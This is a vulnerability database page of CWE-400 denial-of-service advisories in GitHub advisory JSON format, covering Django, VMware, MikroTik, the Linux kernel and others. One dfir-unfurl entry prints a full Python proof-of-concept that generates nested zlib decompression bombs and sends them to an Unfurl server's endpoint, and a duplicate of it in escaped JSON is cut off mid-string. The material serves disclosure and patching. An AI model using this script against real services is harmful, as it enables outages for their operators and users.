CWE-400
DiscouragedUncontrolled Resource Consumption
Abstraction: Class · Status: Draft
The product does not properly control the allocation and maintenance of a limited resource.
5423 vulnerabilities reference this CWE, most recent first.
GHSA-H55X-H29W-R6PG
Vulnerability from github – Published: 2026-01-20 15:33 – Updated: 2026-02-02 18:31A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible.
{
"affected": [],
"aliases": [
"CVE-2025-9278"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-20T14:16:08Z",
"severity": "HIGH"
},
"details": "A security issue exists within ArmorStart\u00ae LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible.",
"id": "GHSA-h55x-h29w-r6pg",
"modified": "2026-02-02T18:31:30Z",
"published": "2026-01-20T15:33:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9278"
},
{
"type": "WEB",
"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-H593-CG7R-4HP4
Vulnerability from github – Published: 2025-05-20 15:30 – Updated: 2025-05-20 15:30VMware ESXi, Workstation, and Fusion contain a denial-of-service vulnerability due to certain guest options. A malicious actor with non-administrative privileges within a guest operating system may be able to exploit this issue by exhausting memory of the host process leading to a denial-of-service condition.
{
"affected": [],
"aliases": [
"CVE-2025-41227"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-20T15:16:07Z",
"severity": "MODERATE"
},
"details": "VMware ESXi,\u00a0Workstation, and Fusion contain a denial-of-service vulnerability due to certain guest options.\u00a0A malicious actor with non-administrative privileges within a guest operating system may be able to exploit this issue by exhausting memory of the host process leading to a denial-of-service condition.",
"id": "GHSA-h593-cg7r-4hp4",
"modified": "2025-05-20T15:30:41Z",
"published": "2025-05-20T15:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41227"
},
{
"type": "WEB",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25717"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H5G4-HPFP-3289
Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2022-05-13 01:47A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically.
{
"affected": [],
"aliases": [
"CVE-2017-8338"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-05-18T06:29:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically.",
"id": "GHSA-h5g4-hpfp-3289",
"modified": "2022-05-13T01:47:28Z",
"published": "2022-05-13T01:47:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8338"
},
{
"type": "WEB",
"url": "https://cxsecurity.com/issue/WLB-2017050062"
},
{
"type": "WEB",
"url": "https://packetstormsecurity.com/files/142538/MikroTik-RouterBoard-6.38.5-Denial-Of-Service.html"
},
{
"type": "WEB",
"url": "https://www.vulnerability-lab.com/get_content.php?id=2064"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2017/May/59"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H5G6-38C3-C3XV
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-05-24 19:03A vulnerability was found in Linux kernel where non-blocking socket in llcp_sock_connect() leads to leak and eventually hanging-up the system.
{
"affected": [],
"aliases": [
"CVE-2020-25673"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-26T11:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in Linux kernel where non-blocking socket in llcp_sock_connect() leads to leak and eventually hanging-up the system.",
"id": "GHSA-h5g6-38c3-c3xv",
"modified": "2022-05-24T19:03:23Z",
"published": "2022-05-24T19:03:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25673"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PW3OASG7OEMHANDWBM5US5WKTOC76KMH"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UTVACC6PGS6OSD3EYY7FZUAZT2EUMFH5"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VEIEGQXUW37YHZ5MTAZTDCIMHUN26NJS"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PW3OASG7OEMHANDWBM5US5WKTOC76KMH"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTVACC6PGS6OSD3EYY7FZUAZT2EUMFH5"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VEIEGQXUW37YHZ5MTAZTDCIMHUN26NJS"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210702-0008"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2020/11/01/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2020/11/01/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H5G9-4XW7-698R
Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-10-19 19:00An integer overflow leading to a heap-buffer overflow was found in OpenEXR in versions before 3.0.1. An attacker could use this flaw to crash an application compiled with OpenEXR.
{
"affected": [],
"aliases": [
"CVE-2021-26945"
],
"database_specific": {
"cwe_ids": [
"CWE-190",
"CWE-191",
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-08T12:15:00Z",
"severity": "MODERATE"
},
"details": "An integer overflow leading to a heap-buffer overflow was found in OpenEXR in versions before 3.0.1. An attacker could use this flaw to crash an application compiled with OpenEXR.",
"id": "GHSA-h5g9-4xw7-698r",
"modified": "2022-10-19T19:00:25Z",
"published": "2022-05-24T19:04:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26945"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1947591"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H5JV-4P7W-64JG
Vulnerability from github – Published: 2019-08-06 01:43 – Updated: 2024-09-20 16:25An issue was discovered in Django 1.11.x before 1.11.23, 2.1.x before 2.1.11, and 2.2.x before 2.2.4. Due to the behaviour of the underlying HTMLParser, django.utils.html.strip_tags would be extremely slow to evaluate certain inputs containing large sequences of nested incomplete HTML entities.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Django"
},
"ranges": [
{
"events": [
{
"introduced": "1.11a1"
},
{
"fixed": "1.11.23"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Django"
},
"ranges": [
{
"events": [
{
"introduced": "2.1a1"
},
{
"fixed": "2.1.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Django"
},
"ranges": [
{
"events": [
{
"introduced": "2.2a1"
},
{
"fixed": "2.2.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-14233"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2019-08-06T01:36:05Z",
"nvd_published_at": "2019-08-02T15:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Django 1.11.x before 1.11.23, 2.1.x before 2.1.11, and 2.2.x before 2.2.4. Due to the behaviour of the underlying HTMLParser, django.utils.html.strip_tags would be extremely slow to evaluate certain inputs containing large sequences of nested incomplete HTML entities.",
"id": "GHSA-h5jv-4p7w-64jg",
"modified": "2024-09-20T16:25:06Z",
"published": "2019-08-06T01:43:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14233"
},
{
"type": "WEB",
"url": "https://docs.djangoproject.com/en/dev/releases/security"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-h5jv-4p7w-64jg"
},
{
"type": "PACKAGE",
"url": "https://github.com/django/django"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2019-12.yaml"
},
{
"type": "WEB",
"url": "https://groups.google.com/forum/#!topic/django-announce/jIoju2-KLDs"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/STVX7X7IDWAH5SKE6MBMY3TEI6ZODBTK"
},
{
"type": "WEB",
"url": "https://seclists.org/bugtraq/2019/Aug/15"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202004-17"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20190828-0002"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2019/dsa-4498"
},
{
"type": "WEB",
"url": "https://www.djangoproject.com/weblog/2019/aug/01/security-releases"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Django Denial-of-service in strip_tags()"
}
GHSA-H5QV-QJV4-PC5M
Vulnerability from github – Published: 2026-01-29 15:31 – Updated: 2026-04-10 17:18Summary
The compressed data parser uses zlib.decompress() without a maximum output size. A small, highly compressed payload can expand to a very large output, causing memory exhaustion and denial of service.
Details
unfurl/parsers/parse_compressed.pycallszlib.decompress(decoded)with no size limit.- Inputs are accepted from URL components that match base64 patterns.
- Highly compressible payloads can expand orders of magnitude larger than their compressed size.
PoC
- Generate a payload with
security_poc/poc_decompression_bomb.py --generate-only. - The script creates a base64-encoded zlib payload embedded in a URL.
- Submitting the URL to
/json/visjscan cause the server to allocate large amounts of memory. - The script includes a
--testmode but warns it can crash the service.
PoC Script
#!/usr/bin/env python3
"""
Unfurl Decompression Bomb Proof of Concept
==========================================
This PoC demonstrates a Denial of Service vulnerability in Unfurl's
compressed data parsing. The zlib.decompress() call has no size limits,
allowing an attacker to submit small payloads that expand to gigabytes.
Vulnerability Location:
- parse_compressed.py:81-82:
inflated_bytes = zlib.decompress(decoded) # No maxsize parameter
Attack Impact:
- Memory exhaustion
- Service crash
- Resource consumption (cloud cost attacks)
Usage:
python poc_decompression_bomb.py [--target URL] [--size SIZE_MB]
"""
import argparse
import base64
import os
import zlib
import requests
import sys
import time
def create_compression_bomb(target_size_mb: int = 100) -> bytes:
"""
Create a compression bomb - small compressed data that expands to target_size_mb.
Compression ratio for zeros can be ~1000:1 or better.
A 1KB compressed payload can expand to ~1MB.
A 100KB payload can expand to ~100MB.
"""
# Create highly compressible data (all zeros)
target_bytes = target_size_mb * 1024 * 1024
uncompressed = b'\x00' * target_bytes
# Compress with maximum compression
compressed = zlib.compress(uncompressed, 9)
compression_ratio = len(uncompressed) / len(compressed)
print(f"[*] Created compression bomb:")
print(f" Compressed size: {len(compressed):,} bytes ({len(compressed)/1024:.2f} KB)")
print(f" Uncompressed size: {len(uncompressed):,} bytes ({target_size_mb} MB)")
print(f" Compression ratio: {compression_ratio:.0f}:1")
return compressed
def create_nested_bomb(levels: int = 3, base_size_mb: int = 10) -> bytes:
"""
Create a nested compression bomb (zip bomb style).
Each level multiplies the final size.
Warning: This can create VERY large expansions.
3 levels with 10MB base = 10^3 = 1GB
4 levels with 10MB base = 10^4 = 10GB
"""
print(f"[*] Creating nested bomb with {levels} levels, {base_size_mb}MB base")
# Start with base payload
data = b'\x00' * (base_size_mb * 1024 * 1024)
for level in range(levels):
data = zlib.compress(data, 9)
print(f" Level {level + 1}: {len(data):,} bytes")
theoretical_size = base_size_mb * (1000 ** levels) # Rough estimate
print(f"[*] Theoretical expanded size: ~{theoretical_size} MB")
return data
def create_recursive_quine_bomb() -> bytes:
"""
Create a recursive decompression scenario.
When decompressed, the output is valid zlib that can be decompressed again.
This exploits any recursive decompression logic.
"""
# This is a simplified version - real quine bombs are more complex
# The concept: output when decompressed is also valid compressed data
# Create a pattern that when decompressed resembles compressed data
# This is primarily theoretical for this vulnerability
base = b'x\x9c' + (b'\x00' * 1000) # Fake zlib header + zeros
return zlib.compress(base * 1000, 9)
def encode_for_unfurl(compressed: bytes) -> str:
"""
Encode compressed data as base64 for URL inclusion.
Unfurl's parse_compressed.py will:
1. Detect base64 pattern
2. Decode base64
3. Attempt zlib.decompress() without size limit
"""
return base64.b64encode(compressed).decode('ascii')
def create_malicious_url(payload: str) -> str:
"""
Create a URL containing the bomb payload.
Multiple injection points are possible.
"""
# As a query parameter value
return f"https://example.com/page?data={payload}"
def test_vulnerability(target_url: str, payload_url: str, timeout: float = 30.0) -> dict:
"""
Submit bomb to Unfurl and monitor for DoS indicators.
"""
api_url = f"{target_url}/json/visjs"
params = {'url': payload_url}
result = {
'submitted': True,
'timeout': False,
'error': None,
'response_time': 0,
'memory_exhaustion_likely': False
}
try:
start = time.time()
response = requests.get(api_url, params=params, timeout=timeout)
result['response_time'] = time.time() - start
result['status_code'] = response.status_code
# Check for error responses indicating resource issues
if response.status_code == 500:
result['error'] = 'Server error - possible memory exhaustion'
result['memory_exhaustion_likely'] = True
elif response.status_code == 503:
result['error'] = 'Service unavailable - DoS successful'
result['memory_exhaustion_likely'] = True
except requests.exceptions.Timeout:
result['timeout'] = True
result['error'] = f'Request timed out after {timeout}s - possible DoS'
result['memory_exhaustion_likely'] = True
except requests.exceptions.ConnectionError as e:
result['error'] = f'Connection error: {e} - server may have crashed'
result['memory_exhaustion_likely'] = True
except Exception as e:
result['error'] = str(e)
return result
def main():
parser = argparse.ArgumentParser(description='Unfurl Decompression Bomb PoC')
parser.add_argument('--target', default='http://localhost:5000',
help='Target Unfurl instance URL')
parser.add_argument('--size', type=int, default=100,
help='Target decompressed size in MB')
parser.add_argument('--nested', type=int, default=0,
help='Nesting levels for nested bomb (0 = simple bomb)')
parser.add_argument('--test', action='store_true',
help='Actually send the bomb (DANGEROUS)')
parser.add_argument('--generate-only', action='store_true',
help='Only generate payload, do not send')
parser.add_argument('--output', help='Save payload to file')
args = parser.parse_args()
print(f"""
╔═══════════════════════════════════════════════════════════════╗
║ UNFURL DECOMPRESSION BOMB PROOF OF CONCEPT ║
╠═══════════════════════════════════════════════════════════════╣
║ Target: {args.target:<45} ║
║ Expanded Size: {args.size:<45} MB ║
║ Nested Levels: {args.nested:<45} ║
╚═══════════════════════════════════════════════════════════════╝
""")
# Generate the bomb
if args.nested > 0:
print(f"\n[!] Creating NESTED bomb - theoretical size could be enormous!")
print(f" Be very careful with nested levels > 2")
if args.nested > 3:
print(f"[!] {args.nested} levels could produce terabytes of data!")
confirm = input(" Continue? (yes/no): ")
if confirm.lower() != 'yes':
sys.exit(0)
compressed = create_nested_bomb(args.nested, args.size // (10 ** args.nested) or 1)
else:
compressed = create_compression_bomb(args.size)
# Encode for URL
b64_payload = encode_for_unfurl(compressed)
malicious_url = create_malicious_url(b64_payload)
print(f"\n[*] Payload Statistics:")
print(f" Compressed size: {len(compressed):,} bytes")
print(f" Base64 size: {len(b64_payload):,} bytes")
print(f" URL length: {len(malicious_url):,} bytes")
# Save payload if requested
if args.output:
with open(args.output, 'w') as f:
f.write(malicious_url)
print(f"\n[+] Payload saved to: {args.output}")
# Display truncated payload
print(f"\n[*] Malicious URL (truncated):")
print(f" {malicious_url[:100]}...")
print(f" (Full URL is {len(malicious_url):,} characters)")
# Save full payload for reference
script_dir = os.path.dirname(os.path.abspath(__file__))
payload_path = os.path.join(script_dir, 'bomb_payload.txt')
with open(payload_path, 'w') as f:
f.write(malicious_url)
print(f"\n[+] Full payload saved to: {payload_path}")
# Verify the bomb works locally
print(f"\n[*] Verifying bomb locally (limited test)...")
try:
# Only decompress a small portion to verify it's valid
test_data = zlib.decompress(compressed, bufsize=1024*1024) # 1MB max
print(f" ✅ Bomb is valid - decompresses to zeros")
except Exception as e:
print(f" ❌ Error: {e}")
sys.exit(1)
if args.generate_only:
print("\n[*] Generate-only mode. Not sending payload.")
sys.exit(0)
if not args.test:
print(f"""
╔═══════════════════════════════════════════════════════════════╗
║ SAFETY CHECK ║
╚═══════════════════════════════════════════════════════════════╝
To actually test this vulnerability, run with --test flag.
Manual testing:
1. Copy the payload URL from {payload_path}
2. Submit it to the target Unfurl instance
3. Monitor server memory usage
Expected behavior if vulnerable:
- Server memory usage spikes dramatically
- Request hangs or times out
- Server may crash or become unresponsive
Mitigation check:
The vulnerability is FIXED if zlib.decompress() is called with
a max_length parameter, e.g.:
zlib.decompress(data, bufsize=10*1024*1024) # 10MB limit
""")
sys.exit(0)
# Actually test (dangerous!)
print(f"\n[!] SENDING BOMB TO {args.target}")
print(f"[!] This may crash the target service!")
confirm = input(" Type 'CONFIRM' to proceed: ")
if confirm != 'CONFIRM':
print(" Aborted.")
sys.exit(0)
print(f"\n[*] Submitting payload...")
result = test_vulnerability(args.target, malicious_url, timeout=60.0)
print(f"\n[*] Results:")
print(f" Timeout: {result['timeout']}")
print(f" Response time: {result['response_time']:.2f}s")
print(f" Error: {result['error']}")
print(f" Memory exhaustion likely: {result['memory_exhaustion_likely']}")
if result['memory_exhaustion_likely']:
print(f"""
╔═══════════════════════════════════════════════════════════════╗
║ VULNERABILITY CONFIRMED ║
╚═══════════════════════════════════════════════════════════════╝
The target appears vulnerable to decompression bomb attacks.
Evidence:
- {result['error'] or 'Abnormal response observed'}
Recommendation:
Add size limits to zlib.decompress() calls:
# Before (vulnerable):
inflated_bytes = zlib.decompress(decoded)
# After (fixed):
MAX_DECOMPRESSED_SIZE = 10 * 1024 * 1024 # 10MB
inflated_bytes = zlib.decompress(decoded, bufsize=MAX_DECOMPRESSED_SIZE)
Or use streaming decompression with size checks:
decompressor = zlib.decompressobj()
chunks = []
total_size = 0
for chunk in iter(lambda: compressed_data.read(4096), b''):
decompressed = decompressor.decompress(chunk)
total_size += len(decompressed)
if total_size > MAX_SIZE:
raise ValueError("Decompressed data too large")
chunks.append(decompressed)
""")
else:
print("\n[*] Target may not be vulnerable or attack was mitigated.")
if __name__ == '__main__':
main()
Impact
A remote, unauthenticated attacker can cause high memory usage and potentially crash the service. The impact depends on deployment limits (process memory, URL length limits, and request size limits).
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "dfir-unfurl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "20260405"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40036"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-29T15:31:30Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe compressed data parser uses `zlib.decompress()` without a maximum output size. A small, highly compressed payload can expand to a very large output, causing memory exhaustion and denial of service.\n\n### Details\n- `unfurl/parsers/parse_compressed.py` calls `zlib.decompress(decoded)` with no size limit.\n- Inputs are accepted from URL components that match base64 patterns.\n- Highly compressible payloads can expand orders of magnitude larger than their compressed size.\n\n### PoC\n1. Generate a payload with `security_poc/poc_decompression_bomb.py --generate-only`.\n2. The script creates a base64-encoded zlib payload embedded in a URL.\n3. Submitting the URL to `/json/visjs` can cause the server to allocate large amounts of memory.\n4. The script includes a `--test` mode but warns it can crash the service.\n\n### PoC Script\n```python\n#!/usr/bin/env python3\n\"\"\"\nUnfurl Decompression Bomb Proof of Concept\n==========================================\n\nThis PoC demonstrates a Denial of Service vulnerability in Unfurl\u0027s\ncompressed data parsing. The zlib.decompress() call has no size limits,\nallowing an attacker to submit small payloads that expand to gigabytes.\n\nVulnerability Location:\n- parse_compressed.py:81-82:\n inflated_bytes = zlib.decompress(decoded) # No maxsize parameter\n\nAttack Impact:\n- Memory exhaustion\n- Service crash\n- Resource consumption (cloud cost attacks)\n\nUsage:\n python poc_decompression_bomb.py [--target URL] [--size SIZE_MB]\n\"\"\"\n\nimport argparse\nimport base64\nimport os\nimport zlib\nimport requests\nimport sys\nimport time\n\n\ndef create_compression_bomb(target_size_mb: int = 100) -\u003e bytes:\n \"\"\"\n Create a compression bomb - small compressed data that expands to target_size_mb.\n\n Compression ratio for zeros can be ~1000:1 or better.\n A 1KB compressed payload can expand to ~1MB.\n A 100KB payload can expand to ~100MB.\n \"\"\"\n # Create highly compressible data (all zeros)\n target_bytes = target_size_mb * 1024 * 1024\n uncompressed = b\u0027\\x00\u0027 * target_bytes\n\n # Compress with maximum compression\n compressed = zlib.compress(uncompressed, 9)\n\n compression_ratio = len(uncompressed) / len(compressed)\n\n print(f\"[*] Created compression bomb:\")\n print(f\" Compressed size: {len(compressed):,} bytes ({len(compressed)/1024:.2f} KB)\")\n print(f\" Uncompressed size: {len(uncompressed):,} bytes ({target_size_mb} MB)\")\n print(f\" Compression ratio: {compression_ratio:.0f}:1\")\n\n return compressed\n\n\ndef create_nested_bomb(levels: int = 3, base_size_mb: int = 10) -\u003e bytes:\n \"\"\"\n Create a nested compression bomb (zip bomb style).\n Each level multiplies the final size.\n\n Warning: This can create VERY large expansions.\n 3 levels with 10MB base = 10^3 = 1GB\n 4 levels with 10MB base = 10^4 = 10GB\n \"\"\"\n print(f\"[*] Creating nested bomb with {levels} levels, {base_size_mb}MB base\")\n\n # Start with base payload\n data = b\u0027\\x00\u0027 * (base_size_mb * 1024 * 1024)\n\n for level in range(levels):\n data = zlib.compress(data, 9)\n print(f\" Level {level + 1}: {len(data):,} bytes\")\n\n theoretical_size = base_size_mb * (1000 ** levels) # Rough estimate\n print(f\"[*] Theoretical expanded size: ~{theoretical_size} MB\")\n\n return data\n\n\ndef create_recursive_quine_bomb() -\u003e bytes:\n \"\"\"\n Create a recursive decompression scenario.\n When decompressed, the output is valid zlib that can be decompressed again.\n\n This exploits any recursive decompression logic.\n \"\"\"\n # This is a simplified version - real quine bombs are more complex\n # The concept: output when decompressed is also valid compressed data\n\n # Create a pattern that when decompressed resembles compressed data\n # This is primarily theoretical for this vulnerability\n base = b\u0027x\\x9c\u0027 + (b\u0027\\x00\u0027 * 1000) # Fake zlib header + zeros\n return zlib.compress(base * 1000, 9)\n\n\ndef encode_for_unfurl(compressed: bytes) -\u003e str:\n \"\"\"\n Encode compressed data as base64 for URL inclusion.\n Unfurl\u0027s parse_compressed.py will:\n 1. Detect base64 pattern\n 2. Decode base64\n 3. Attempt zlib.decompress() without size limit\n \"\"\"\n return base64.b64encode(compressed).decode(\u0027ascii\u0027)\n\n\ndef create_malicious_url(payload: str) -\u003e str:\n \"\"\"\n Create a URL containing the bomb payload.\n Multiple injection points are possible.\n \"\"\"\n # As a query parameter value\n return f\"https://example.com/page?data={payload}\"\n\n\ndef test_vulnerability(target_url: str, payload_url: str, timeout: float = 30.0) -\u003e dict:\n \"\"\"\n Submit bomb to Unfurl and monitor for DoS indicators.\n \"\"\"\n api_url = f\"{target_url}/json/visjs\"\n params = {\u0027url\u0027: payload_url}\n\n result = {\n \u0027submitted\u0027: True,\n \u0027timeout\u0027: False,\n \u0027error\u0027: None,\n \u0027response_time\u0027: 0,\n \u0027memory_exhaustion_likely\u0027: False\n }\n\n try:\n start = time.time()\n response = requests.get(api_url, params=params, timeout=timeout)\n result[\u0027response_time\u0027] = time.time() - start\n result[\u0027status_code\u0027] = response.status_code\n\n # Check for error responses indicating resource issues\n if response.status_code == 500:\n result[\u0027error\u0027] = \u0027Server error - possible memory exhaustion\u0027\n result[\u0027memory_exhaustion_likely\u0027] = True\n elif response.status_code == 503:\n result[\u0027error\u0027] = \u0027Service unavailable - DoS successful\u0027\n result[\u0027memory_exhaustion_likely\u0027] = True\n\n except requests.exceptions.Timeout:\n result[\u0027timeout\u0027] = True\n result[\u0027error\u0027] = f\u0027Request timed out after {timeout}s - possible DoS\u0027\n result[\u0027memory_exhaustion_likely\u0027] = True\n except requests.exceptions.ConnectionError as e:\n result[\u0027error\u0027] = f\u0027Connection error: {e} - server may have crashed\u0027\n result[\u0027memory_exhaustion_likely\u0027] = True\n except Exception as e:\n result[\u0027error\u0027] = str(e)\n\n return result\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\u0027Unfurl Decompression Bomb PoC\u0027)\n parser.add_argument(\u0027--target\u0027, default=\u0027http://localhost:5000\u0027,\n help=\u0027Target Unfurl instance URL\u0027)\n parser.add_argument(\u0027--size\u0027, type=int, default=100,\n help=\u0027Target decompressed size in MB\u0027)\n parser.add_argument(\u0027--nested\u0027, type=int, default=0,\n help=\u0027Nesting levels for nested bomb (0 = simple bomb)\u0027)\n parser.add_argument(\u0027--test\u0027, action=\u0027store_true\u0027,\n help=\u0027Actually send the bomb (DANGEROUS)\u0027)\n parser.add_argument(\u0027--generate-only\u0027, action=\u0027store_true\u0027,\n help=\u0027Only generate payload, do not send\u0027)\n parser.add_argument(\u0027--output\u0027, help=\u0027Save payload to file\u0027)\n args = parser.parse_args()\n\n print(f\"\"\"\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 UNFURL DECOMPRESSION BOMB PROOF OF CONCEPT \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551 Target: {args.target:\u003c45} \u2551\n\u2551 Expanded Size: {args.size:\u003c45} MB \u2551\n\u2551 Nested Levels: {args.nested:\u003c45} \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\"\"\")\n\n # Generate the bomb\n if args.nested \u003e 0:\n print(f\"\\n[!] Creating NESTED bomb - theoretical size could be enormous!\")\n print(f\" Be very careful with nested levels \u003e 2\")\n if args.nested \u003e 3:\n print(f\"[!] {args.nested} levels could produce terabytes of data!\")\n confirm = input(\" Continue? (yes/no): \")\n if confirm.lower() != \u0027yes\u0027:\n sys.exit(0)\n compressed = create_nested_bomb(args.nested, args.size // (10 ** args.nested) or 1)\n else:\n compressed = create_compression_bomb(args.size)\n\n # Encode for URL\n b64_payload = encode_for_unfurl(compressed)\n malicious_url = create_malicious_url(b64_payload)\n\n print(f\"\\n[*] Payload Statistics:\")\n print(f\" Compressed size: {len(compressed):,} 